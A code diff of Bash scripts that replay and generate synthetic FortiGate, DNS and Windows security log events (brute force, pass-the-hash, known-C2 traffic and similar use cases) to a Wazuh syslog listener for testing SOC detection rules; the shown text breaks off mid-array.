-SIM_VPN_USER="${SIM_VPN_USER:-remote.user}"
-
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
-  echo "error: count must be a positive integer"
-  exit 1
-fi
-
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: delay must be numeric"
-  exit 1
-fi
-
-if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
-  echo "error: EVENT_DELAY must be numeric"
-  exit 1
-fi
-
-if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
-  echo "error: profile must be simulation or production"
-  exit 1
-fi
-
-rand_public_ip() {
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
-    echo "198.51.100.$((RANDOM % 240 + 10))"
-  else
-    echo "203.0.113.$((RANDOM % 240 + 10))"
-  fi
-}
-
-rand_private_ip() {
-  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
-}
-
-rand_domain() {
-  echo "ioc-$((RANDOM % 9000 + 1000)).malicious.example"
-}
-
-emit_syslog() {
-  local msg="$1"
-  local sent="false"
-
-  if [[ "${DRY_RUN}" == "1" ]]; then
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
-    return 0
-  fi
-
-  if command -v nc >/dev/null 2>&1; then
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
-      sent="true"
-    fi
-  fi
-
-  if [[ "${sent}" != "true" ]]; then
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-    return 1
-  fi
-
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
-}
-
-selector_matches() {
-  local id="$1"
-  local section="$2"
-  local sel
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
-  local idl
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
-  local sec
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
-
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
-}
-
-emit_fgt_usecase() {
-  local id="$1"
-  local section="$2"
-  local severity="$3"
-  local usecase="$4"
-  local body="$5"
-
-  selector_matches "${id}" "${section}" || return 0
-
-  local tags
-  if [[ "${PROFILE}" == "production" ]]; then
-    tags="soc_mvp_test=true source=fortigate severity=${severity}"
-  else
-    tags="soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
-  fi
-  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" ${tags} ${body}"
-  sleep "${EVENT_DELAY}"
-}
-
-emit_dns_usecase() {
-  local id="$1"
-  local section="$2"
-  local severity="$3"
-  local usecase="$4"
-  local body="$5"
-
-  selector_matches "${id}" "${section}" || return 0
-
-  local tags
-  if [[ "${PROFILE}" == "production" ]]; then
-    tags="soc_mvp_test=true source=dns severity=${severity}"
-  else
-    tags="soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
-  fi
-  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} ${tags} ${body}"
-  sleep "${EVENT_DELAY}"
-}
-
-emit_windows_usecase() {
-  local id="$1"
-  local section="$2"
-  local severity="$3"
-  local usecase="$4"
-  local body="$5"
-
-  selector_matches "${id}" "${section}" || return 0
-
-  local tags
-  if [[ "${PROFILE}" == "production" ]]; then
-    tags="soc_mvp_test=true source=windows severity=${severity}"
-  else
-    tags="soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
-  fi
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} ${tags} ${body}"
-  sleep "${EVENT_DELAY}"
-}
-
-emit_a1() {
-  local sip
-  local domain
-  local mip
-  sip="$(rand_private_ip)"
-  domain="$(rand_domain)"
-  mip="$(rand_public_ip)"
-
-  emit_dns_usecase "A1-01" "A1" "medium" \
-    "DNS Network Traffic Communicate to Malicious Domain" \
-    "event_type=ioc_dns_traffic src_ip=${sip} query=${domain} resolved_ip=${mip} action=blocked"
-
-  emit_dns_usecase "A1-02" "A1" "medium" \
-    "DNS Network Traffic Malicious Domain IOCs Detection" \
-    "event_type=ioc_domain_match src_ip=${sip} ioc_type=domain ioc_value=${domain} feed=threatintel_main confidence=high action=alert"
-}
-
-emit_a2() {
-  local pub
-  local sip
-  pub="$(rand_public_ip)"
-  sip="$(rand_private_ip)"
-
-  emit_fgt_usecase "A2-01" "A2" "high" "IPS IDS Network Traffic Allowed RDP from Public IPs" \
-    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=${pub} dstip=${sip} dstport=3389 service=\"RDP\" action=\"accept\" policyid=44"
-
-  emit_fgt_usecase "A2-02" "A2" "high" "IPS IDS Firewall Account Admin Password Change" \
-    "logid=\"0100044547\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"password-change\" target_account=\"admin\""
-
-  emit_fgt_usecase "A2-03" "A2" "high" "IPS IDS Firewall Account Create Add Admin Account" \
-    "logid=\"0100044548\" type=\"event\" subtype=\"system\" user=\"admin\" action=\"create-admin\" target_account=\"secops_admin\""
-
-  emit_fgt_usecase "A2-04" "A2" "high" "IPS IDS Firewall Configure Disabled Email Notification" \
-    "logid=\"0100044551\" type=\"event\" subtype=\"system\" action=\"config-change\" config_item=\"alertemail\" config_value=\"disable\""
-
-  emit_fgt_usecase "A2-05" "A2" "low" "IPS IDS Firewall Configure Download Configure FW" \
-    "logid=\"0100044552\" type=\"event\" subtype=\"system\" action=\"download-config\" user=\"admin\""
-
-  emit_fgt_usecase "A2-06" "A2" "medium" "IPS IDS IDS Alert Multiple Critical High" \
-    "logid=\"0720018432\" type=\"utm\" subtype=\"ips\" action=\"detected\" attack=\"Multiple.Critical.High.Signatures\" severity=\"high\" count=7"
-
-  emit_fgt_usecase "A2-07" "A2" "low" "IPS IDS Network Traffic Port Scanning" \
-    "logid=\"0720018433\" type=\"utm\" subtype=\"anomaly\" attack=\"TCP.Port.Scan\" srcip=${pub} dstip=${sip} action=\"detected\""
-
-  emit_fgt_usecase "A2-08" "A2" "medium" "IPS IDS Network Traffic IOC Detection" \
-    "logid=\"0720018434\" type=\"utm\" subtype=\"ips\" ioc_type=ip ioc_value=$(rand_public_ip) action=\"blocked\""
-
-  emit_fgt_usecase "A2-09" "A2" "medium" "IPS IDS Network Traffic Port Scanning from Private IP" \
-    "logid=\"0720018435\" type=\"utm\" subtype=\"anomaly\" attack=\"Internal.Port.Scan\" srcip=$(rand_private_ip) dstip=$(rand_private_ip) action=\"detected\""
-
-  emit_fgt_usecase "A2-10" "A2" "medium" "IPS IDS Network Traffic Communicate to Malicious IP" \
-    "logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" srcip=$(rand_private_ip) dstip=$(rand_public_ip) threat_label=\"known-c2\" action=\"accept\""
-}
-
-emit_a3() {
-  local out_th
-  out_th="$(rand_public_ip)"
-
-  emit_fgt_usecase "A3-01" "A3" "high" "VPN Authentication Success from Guest Account" \
-    "logid=\"0101037131\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"guest\" srcip=${out_th} country=\"TH\""
-
-  emit_fgt_usecase "A3-02" "A3" "high" "VPN Authentication Success from Multiple Country" \
-    "logid=\"0101037132\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" previous_country=\"TH\""
-
-  emit_fgt_usecase "A3-03" "A3" "high" "VPN Authentication Brute Force Success" \
-    "logid=\"0101037133\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} failed_attempts_before_success=18"
-
-  emit_fgt_usecase "A3-04" "A3" "low" "VPN Authentication Multiple Fail Many Accounts from One Source" \
-    "logid=\"0101037134\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-fail\" srcip=${out_th} failed_accounts=12"
-
-  emit_fgt_usecase "A3-05" "A3" "high" "VPN Authentication Success from Outside Thailand" \
-    "logid=\"0101037135\" type=\"event\" subtype=\"vpn\" action=\"ssl-login-success\" user=\"${SIM_VPN_USER}\" srcip=${out_th} country=\"US\" expected_country=\"TH\""
-}
-
-emit_a4() {
-  emit_windows_usecase "A4-01" "A4" "medium" "Windows Authentication Multiple Fail from Privileged Account" \
-    "event_id=4625 account=\"administrator\" src_ip=$(rand_private_ip) fail_count=9"
-  emit_windows_usecase "A4-02" "A4" "medium" "Windows Authentication Multiple Fail from Service Account" \
-    "event_id=4625 account=\"svc_backup\" src_ip=$(rand_private_ip) fail_count=11"
-  emit_windows_usecase "A4-03" "A4" "medium" "Windows AD Enumeration with Malicious Tools" \
-    "event_id=4688 process=\"adfind.exe\" user=\"user1\" host=\"${WIN_HOST}\""
-  emit_windows_usecase "A4-04" "A4" "medium" "Windows Authentication Fail from Public IPs" \
-    "event_id=4625 account=\"user1\" src_ip=$(rand_public_ip) fail_count=4"
-  emit_windows_usecase "A4-05" "A4" "medium" "Windows File Share Enumeration to Single Destination" \
-    "event_id=5145 account=\"user1\" src_ip=$(rand_private_ip) share=\"\\\\\\\\fileserver\\\\finance\" object_count=87"
-  emit_windows_usecase "A4-06" "A4" "high" "Windows Authentication Success from Public IPs" \
-    "event_id=4624 account=\"user2\" src_ip=$(rand_public_ip) logon_type=10"
-  emit_windows_usecase "A4-07" "A4" "high" "Windows Authentication Privileged Account Impersonation" \
-    "event_id=4624 account=\"administrator\" impersonation=true source_account=\"user2\""
-  emit_windows_usecase "A4-08" "A4" "high" "Windows Authentication Successful Pass the Hash RDP" \
-    "event_id=4624 account=\"administrator\" logon_type=10 auth_package=\"NTLM\" pth_indicator=true"
-  emit_windows_usecase "A4-09" "A4" "high" "Windows Authentication Success from Guest Account" \
-    "event_id=4624 account=\"guest\" logon_type=3"
-  emit_windows_usecase "A4-10" "A4" "high" "Windows Authentication Interactive Logon Success by Service Account" \
-    "event_id=4624 account=\"svc_backup\" logon_type=2"
-  emit_windows_usecase "A4-11" "A4" "high" "Windows Account Added to Privileged Custom Group" \
-    "event_id=4732 account=\"user3\" target_group=\"SOC-Privileged-Custom\""
-  emit_windows_usecase "A4-12" "A4" "high" "Windows Account Added to Privileged Group" \
-    "event_id=4728 account=\"user3\" target_group=\"Domain Admins\""
-  emit_windows_usecase "A4-13" "A4" "high" "Windows Domain Configure DSRM Password Reset" \
-    "event_id=4794 account=\"administrator\" action=\"dsrm-password-reset\""
-  emit_windows_usecase "A4-14" "A4" "low" "Windows Authentication Multiple Fail One Account from Many Sources" \
-    "event_id=4625 account=\"user4\" src_count=15 fail_count=28"
-  emit_windows_usecase "A4-15" "A4" "low" "Windows Authentication Multiple Fail Many Accounts from One Source" \
-    "event_id=4625 src_ip=$(rand_private_ip) account_count=18 fail_count=42"
-  emit_windows_usecase "A4-16" "A4" "low" "Windows Authentication Multiple Fail from Guest Account" \
-    "event_id=4625 account=\"guest\" fail_count=9"
-  emit_windows_usecase "A4-17" "A4" "low" "Windows Authentication Multiple Fail One Account from One Source" \
-    "event_id=4625 account=\"user5\" src_ip=$(rand_private_ip) fail_count=10"
-  emit_windows_usecase "A4-18" "A4" "low" "Windows Authentication Multiple Interactive Logon Denied" \
-    "event_id=4625 account=\"user6\" logon_type=2 fail_count=7"
-  emit_windows_usecase "A4-19" "A4" "low" "Windows Authentication Password Spray" \
-    "event_id=4625 spray=true src_ip=$(rand_public_ip) attempted_accounts=25"
-  emit_windows_usecase "A4-20" "A4" "low" "Windows Authentication Attempt from Disabled Account" \
-    "event_id=4625 account=\"disabled.user\" status=\"0xC0000072\""
-  emit_windows_usecase "A4-21" "A4" "low" "Windows Domain Account Created" \
-    "event_id=4720 account=\"new.domain.user\" account_type=\"domain\""
-  emit_windows_usecase "A4-22" "A4" "low" "Windows Local Account Re Enabled" \
-    "event_id=4722 account=\"local.user\" account_type=\"local\""
-  emit_windows_usecase "A4-23" "A4" "low" "Windows Local Account Created" \
-    "event_id=4720 account=\"local.new\" account_type=\"local\""
-  emit_windows_usecase "A4-24" "A4" "low" "Windows Domain Account Re Enabled" \
-    "event_id=4722 account=\"domain.reenabled\" account_type=\"domain\""
-}
-
-emit_selected_set() {
-  local sel
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
-
-  case "${sel}" in
-    all)
-      emit_a1
-      emit_a2
-      emit_a3
-      emit_a4
-      ;;
-    a1|a1-*)
-      emit_a1
-      ;;
-    a2|a2-*)
-      emit_a2
-      ;;
-    a3|a3-*)
-      emit_a3
-      ;;
-    a4|a4-*)
-      emit_a4
-      ;;
-    *)
-      # Exact usecase selectors (e.g. A3-05) are handled by selector_matches.
-      emit_a1
-      emit_a2
-      emit_a3
-      emit_a4
-      ;;
-  esac
-}
-
-echo "starting proposal-required log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
-
-if [[ "${FOREVER}" == "true" ]]; then
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
-  trap 'echo; echo "stopped"; exit 0' INT TERM
-  while true; do
-    emit_selected_set
-    sleep "${DELAY}"
-  done
-else
-  for ((i=1; i<=COUNT; i++)); do
-    emit_selected_set
-    if [[ "${i}" -lt "${COUNT}" ]]; then
-      sleep "${DELAY}"
-    fi
-  done
-  echo "done"
-fi

scripts/send-wazuh-sim-logs.sh

@@ -0,0 +1,550 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Combined Wazuh simulator script (single entrypoint)
+# Replays production-style sample logs from samples/*.log to Wazuh syslog UDP.
+#
+# Usage:
+#   scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run] [--no-mock] [--no-guarantee-hits] [--random-types] [--include-nonalerts] [--docker-send]
+#
+# Selectors:
+#   all
+#   a|b|c|appendix-a|appendix-b|appendix-c
+#   a1|a2|a3|a4|b1|b2|b3|c1|c2|c3
+#   A1-01, A2-10, B3-06, C1-01, ...
+
+SELECTOR="${1:-all}"
+COUNT="${2:-1}"
+DELAY="${3:-1}"
+shift $(( $# >= 3 ? 3 : $# )) || true
+
+FOREVER=0
+DRY_RUN="${DRY_RUN:-0}"
+MOCK_VALUES="${MOCK_VALUES:-1}"
+GUARANTEE_HITS="${GUARANTEE_HITS:-1}"
+RANDOM_TYPES="${RANDOM_TYPES:-0}"
+INCLUDE_NONALERTS="${INCLUDE_NONALERTS:-0}"
+DOCKER_SEND="${DOCKER_SEND:-0}"
+WAZUH_MANAGER_CONTAINER="${WAZUH_MANAGER_CONTAINER:-wazuh-single-wazuh.manager-1}"
+
+for arg in "$@"; do
+  case "$arg" in
+    --forever)
+      FOREVER=1
+      ;;
+    --dry-run)
+      DRY_RUN=1
+      ;;
+    --no-mock)
+      MOCK_VALUES=0
+      ;;
+    --mock)
+      MOCK_VALUES=1
+      ;;
+    --no-guarantee-hits)
+      GUARANTEE_HITS=0
+      ;;
+    --guarantee-hits)
+      GUARANTEE_HITS=1
+      ;;
+    --random-types)
+      RANDOM_TYPES=1
+      ;;
+    --include-nonalerts)
+      INCLUDE_NONALERTS=1
+      ;;
+    --docker-send)
+      DOCKER_SEND=1
+      ;;
+    -h|--help)
+      echo "usage: scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run] [--no-mock] [--no-guarantee-hits] [--random-types] [--include-nonalerts] [--docker-send]"
+      exit 0
+      ;;
+    *)
+      echo "error: unknown option '$arg'"
+      exit 1
+      ;;
+  esac
+done
+
+if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [ "$COUNT" -lt 1 ]; then
+  echo "error: count must be a positive integer"
+  exit 1
+fi
+
+if ! [[ "$DELAY" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
+  echo "error: delay_seconds must be numeric"
+  exit 1
+fi
+
+WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
+WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
+NC_WAIT_SECONDS="${NC_WAIT_SECONDS:-0}"
+STRICT_SEND="${STRICT_SEND:-1}"
+BASE_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+SAMPLES_DIR="${BASE_DIR}/samples"
+
+normalize() {
+  printf '%s' "$1" | tr '[:upper:]' '[:lower:]'
+}
+
+is_valid_selector() {
+  local sel
+  sel="$(normalize "$1")"
+  case "$sel" in
+    all|a|b|c|appendix-a|appendix-b|appendix-c|a1|a2|a3|a4|b1|b2|b3|c1|c2|c3)
+      return 0
+      ;;
+    [abc][0-9]-[0-9][0-9])
+      return 0
+      ;;
+    *)
+      return 1
+      ;;
+  esac
+}
+
+selector_matches_tag() {
+  local selector tag sel tagl
+  selector="$1"
+  tag="$2"
+  sel="$(normalize "$selector")"
+  tagl="$(normalize "$tag")"
+
+  if [ -z "$tagl" ]; then
+    case "$sel" in
+      all|a|b|c|appendix-a|appendix-b|appendix-c)
+        return 0
+        ;;
+      *)
+        return 1
+        ;;
+    esac
+  fi
+
+  case "$sel" in
+    all)
+      return 0
+      ;;
+    a|appendix-a)
+      [[ "$tagl" == a* ]]
+      return
+      ;;
+    b|appendix-b)
+      [[ "$tagl" == b* ]]
+      return
+      ;;
+    c|appendix-c)
+      [[ "$tagl" == c* ]]
+      return
+      ;;
+    a1|a2|a3|a4|b1|b2|b3|c1|c2|c3)
+      [[ "$tagl" == "$sel"-* ]]
+      return
+      ;;
+    [abc][0-9]-[0-9][0-9])
+      [[ "$tagl" == "$sel" ]]
+      return
+      ;;
+    *)
+      return 1
+      ;;
+  esac
+}
+
+sample_files_for_selector() {
+  local sel
+  sel="$(normalize "$1")"
+  case "$sel" in
+    all)
+      echo "${SAMPLES_DIR}/appendix-a-production-samples.log"
+      echo "${SAMPLES_DIR}/appendix-b-production-samples.log"
+      echo "${SAMPLES_DIR}/appendix-c-production-samples.log"
+      ;;
+    a|appendix-a|a1|a2|a3|a4|a[0-9]-[0-9][0-9])
+      echo "${SAMPLES_DIR}/appendix-a-production-samples.log"
+      ;;
+    b|appendix-b|b1|b2|b3|b[0-9]-[0-9][0-9])
+      echo "${SAMPLES_DIR}/appendix-b-production-samples.log"
+      ;;
+    c|appendix-c|c1|c2|c3|c[0-9]-[0-9][0-9])
+      echo "${SAMPLES_DIR}/appendix-c-production-samples.log"
+      ;;
+    *)
+      echo "error: unsupported selector '$1'" >&2
+      return 1
+      ;;
+  esac
+}
+
+emit_syslog() {
+  local line="$1"
+  if [ "${DRY_RUN}" = "1" ]; then
+    echo "DRY_RUN -> ${line}"
+    return 0
+  fi
+
+  if [ "${DOCKER_SEND}" = "1" ]; then
+    if ! printf '%s\n' "${line}" | docker exec -i "${WAZUH_MANAGER_CONTAINER}" bash -lc 'cat > /dev/udp/127.0.0.1/514'; then
+      echo "send_failed target=${WAZUH_MANAGER_CONTAINER}:127.0.0.1:514/udp transport=docker-exec" >&2
+      if [ "${STRICT_SEND}" = "1" ]; then
+        return 1
+      fi
+    fi
+    return 0
+  fi
+
+  if command -v nc >/dev/null 2>&1; then
+    if ! printf '%s\n' "${line}" | nc -w "${NC_WAIT_SECONDS}" -u "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
+      echo "send_failed target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp transport=nc" >&2
+      if [ "${STRICT_SEND}" = "1" ]; then
+        return 1
+      fi
+    fi
+  else
+    if ! printf '%s\n' "${line}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}"; then
+      echo "send_failed target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp transport=devudp" >&2
+      if [ "${STRICT_SEND}" = "1" ]; then
+        return 1
+      fi
+    fi
+  fi
+}
+
+rand_between() {
+  local min max
+  min="$1"
+  max="$2"
+  echo $(( min + RANDOM % (max - min + 1) ))
+}
+
+random_public_ip() {
+  local range last
+  range="$(rand_between 0 2)"
+  last="$(rand_between 2 254)"
+  case "$range" in
+    0) echo "198.51.100.${last}" ;;
+    1) echo "203.0.113.${last}" ;;
+    *) echo "192.0.2.${last}" ;;
+  esac
+}
+
+random_private_ip() {
+  echo "10.$(rand_between 10 30).$(rand_between 1 254).$(rand_between 1 254)"
+}
+
+random_user() {
+  local users=(
+    "admin01" "analyst01" "helpdesk01" "ops.admin" "jane.doe"
+    "svc_backup$" "svc_dbbackup$" "finance.user" "it-admin" "guest"
+  )
+  echo "${users[$((RANDOM % ${#users[@]}))]}"
+}
+
+random_fgt_model() {
+  local models=("FGT40F-Branch01" "FGT60F-Branch01" "FGT80F-Branch01" "FGT501E-DC01")
+  echo "${models[$((RANDOM % ${#models[@]}))]}"
+}
+
+random_devid() {
+  local n
+  n="$(rand_between 10000000 99999999)"
+  echo "FGT80FTK${n}"
+}
+
+random_domain() {
+  echo "ioc-$(rand_between 1000 9999).malicious.example"
+}
+
+replace_kv() {
+  local input key new
+  input="$1"
+  key="$2"
+  new="$3"
+  printf '%s' "$input" | sed -E "s#${key}=\"[^\"]*\"#${key}=\"${new}\"#g; s#${key}=([^\" ][^ ]*)#${key}=${new}#g"
+}
+
+mock_windows_json_line() {
+  local line src_ip
+  line="$1"
+  src_ip="$(random_public_ip)"
+
+  if command -v jq >/dev/null 2>&1; then
+    printf '%s' "$line" | jq -c \
+      --arg srcip "$src_ip" \
+      '
+      if (.win.eventdata | type) == "object" then
+        .win.eventdata |= (
+          if has("subjectUserName") then .subjectUserName = "SYSTEM" else . end |
+          if has("workstationName") then .workstationName = ("WS-" + (($srcip|split("."))[3])) else . end |
+          if has("ipAddress") then .ipAddress = $srcip else . end
+        )
+      else
+        .
+      end
+      ' 2>/dev/null || printf '%s' "$line"
+  else
+    printf '%s' "$line"
+  fi
+}
+
+mock_non_json_line() {
+  local line now_date now_time now_iso epoch src_pub dst_priv prev_pub devname devid query
+  line="$1"
+  now_date="$(date '+%Y-%m-%d')"
+  now_time="$(date '+%H:%M:%S')"
+  now_iso="$(date -u '+%Y-%m-%dT%H:%M:%S.000Z')"
+  epoch="$(date '+%s')"
+  src_pub="$(random_public_ip)"
+  dst_priv="$(random_private_ip)"
+  prev_pub="$(random_public_ip)"
+  devname="$(random_fgt_model)"
+  devid="$(random_devid)"
+  query="$(random_domain)"
+
+  line="$(replace_kv "$line" "date" "$now_date")"
+  line="$(replace_kv "$line" "time" "$now_time")"
+  line="$(replace_kv "$line" "eventtime" "$epoch")"
+  line="$(replace_kv "$line" "devname" "$devname")"
+  line="$(replace_kv "$line" "devid" "$devid")"
+
+  line="$(replace_kv "$line" "srcip" "$src_pub")"
+  line="$(replace_kv "$line" "dstip" "$dst_priv")"
+  line="$(replace_kv "$line" "src_ip" "$src_pub")"
+  line="$(replace_kv "$line" "prev_ip" "$prev_pub")"
+
+  line="$(replace_kv "$line" "query" "$query")"
+
+  line="$(replace_kv "$line" "srcport" "$(rand_between 1025 65535)")"
+  line="$(replace_kv "$line" "distance_km" "$(rand_between 500 16000)")"
+  line="$(replace_kv "$line" "travel_minutes" "$(rand_between 5 180)")"
+
+  if [[ "$line" =~ ^[0-9]{4}-[0-9]{2}-[0-9]{2}T ]]; then
+    line="$(printf '%s' "$line" | sed -E "s#^[0-9]{4}-[0-9]{2}-[0-9]{2}T[^ ]+#${now_iso}#")"
+  fi
+  line="$(printf '%s' "$line" | sed -E "s#from [0-9]{1,3}(\.[0-9]{1,3}){3}#from ${src_pub}#g")"
+  line="$(printf '%s' "$line" | sed -E "s# port [0-9]{2,5}# port $(rand_between 1025 65535)#g")"
+
+  printf '%s' "$line"
+}
+
+mock_line() {
+  local line="$1"
+  if [ "$MOCK_VALUES" != "1" ]; then
+    printf '%s' "$line"
+    return 0
+  fi
+
+  if [[ "$line" =~ ^\{ ]]; then
+    mock_windows_json_line "$line"
+  else
+    mock_non_json_line "$line"
+  fi
+}
+
+send_file_once() {
+  local file selector line sent current_tag extracted
+  file="$1"
+  selector="$2"
+  sent=0
+  current_tag=""
+
+  while IFS= read -r line || [ -n "$line" ]; do
+    if [[ "$line" =~ ^[[:space:]]*#[[:space:]]*([A-Za-z][0-9]-[0-9]{2})([[:space:]]|$) ]]; then
+      extracted="${BASH_REMATCH[1]}"
+      current_tag="$(normalize "$extracted")"
+      continue
+    fi
+
+    if [[ -z "${line// }" ]] || [[ "$line" =~ ^[[:space:]]*# ]]; then
+      continue
+    fi
+
+    if selector_matches_tag "$selector" "$current_tag"; then
+      line="$(mock_line "$line")"
+      emit_syslog "$line"
+      sent=$((sent + 1))
+      sleep "$DELAY"
+    fi
+  done < "$file"
+
+  echo "sent=${sent} file=$(basename "$file") selector=$(normalize "$selector")"
+}
+
+send_guaranteed_hits_once() {
+  local selector sent idx tag line
+  selector="$1"
+  sent=0
+
+  local tags=(
+    "a1-01"
+    "a1-02"
+    "a2-02"
+    "a2-03"
+    "a2-05"
+    "a2-10"
+    "c1-01"
+    "c1-01"
+  )
+
+  local lines=(
+    "soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium"
+    "soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert"
+    "date=2026-03-09 time=10:02:04 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079324 vd=\"root\" logid=\"0100044547\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"password-change\" ui=\"https(10.20.55.1)\""
+    "date=2026-03-09 time=10:02:17 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079337 vd=\"root\" logid=\"0100044548\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"create-admin\" target_user=\"soc-backup-admin\""
+    "date=2026-03-09 time=10:04:03 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079443 vd=\"root\" logid=\"0100044552\" type=\"event\" subtype=\"system\" level=\"notice\" user=\"admin\" action=\"download-config\" dstip=10.20.50.33"
+    "date=2026-03-09 time=10:07:59 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079679 vd=\"root\" logid=\"0000000014\" type=\"traffic\" subtype=\"forward\" level=\"warning\" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label=\"known-c2\" action=\"accept\""
+    "date=2026-03-09 time=10:31:00 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773081060 vd=\"root\" logid=\"0101037135\" type=\"event\" subtype=\"vpn\" tunneltype=\"ssl\" action=\"ssl-login-success\" user=\"analyst01\" srcip=203.0.113.71 previous_country=TH current_country=US"
+    "soc_event=correlation event_type=c1_impossible_travel user=\"analyst01\" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18"
+  )
+
+  for idx in "${!lines[@]}"; do
+    tag="${tags[$idx]}"
+    if selector_matches_tag "$selector" "$tag"; then
+      line="$(mock_line "${lines[$idx]}")"
+      emit_syslog "$line"
+      sent=$((sent + 1))
+      sleep "$DELAY"
+    fi
+  done
+
+  echo "guaranteed_sent=${sent} selector=$(normalize "$selector")"
+}
+
+EVENT_POOL_READY=0
+EVENT_POOL_SELECTOR=""
+declare -a EVENT_POOL_TAGS
+declare -a EVENT_POOL_LINES
+
+build_event_pool() {
+  local selector file line current_tag extracted idx tag
+  selector="$1"
+  EVENT_POOL_READY=0
+  EVENT_POOL_SELECTOR="$selector"
+  EVENT_POOL_TAGS=()
+  EVENT_POOL_LINES=()
+
+  if [ "$INCLUDE_NONALERTS" = "1" ]; then
+    for file in "${FILES[@]}"; do
+      current_tag=""
+      while IFS= read -r line || [ -n "$line" ]; do
+        if [[ "$line" =~ ^[[:space:]]*#[[:space:]]*([A-Za-z][0-9]-[0-9]{2})([[:space:]]|$) ]]; then
+          extracted="${BASH_REMATCH[1]}"
+          current_tag="$(normalize "$extracted")"
+          continue
+        fi
+        if [[ -z "${line// }" ]] || [[ "$line" =~ ^[[:space:]]*# ]]; then
+          continue
+        fi
+        if selector_matches_tag "$selector" "$current_tag"; then
+          EVENT_POOL_TAGS+=("$current_tag")
+          EVENT_POOL_LINES+=("$line")
+        fi
+      done < "$file"
+    done
+  fi
+
+  if [ "$GUARANTEE_HITS" = "1" ]; then
+    local guaranteed_tags=(
+      "a1-01" "a1-02" "a2-02" "a2-03" "a2-05" "a2-10" "c1-01" "c1-01"
+    )
+    local guaranteed_lines=(
+      "soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium"
+      "soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert"
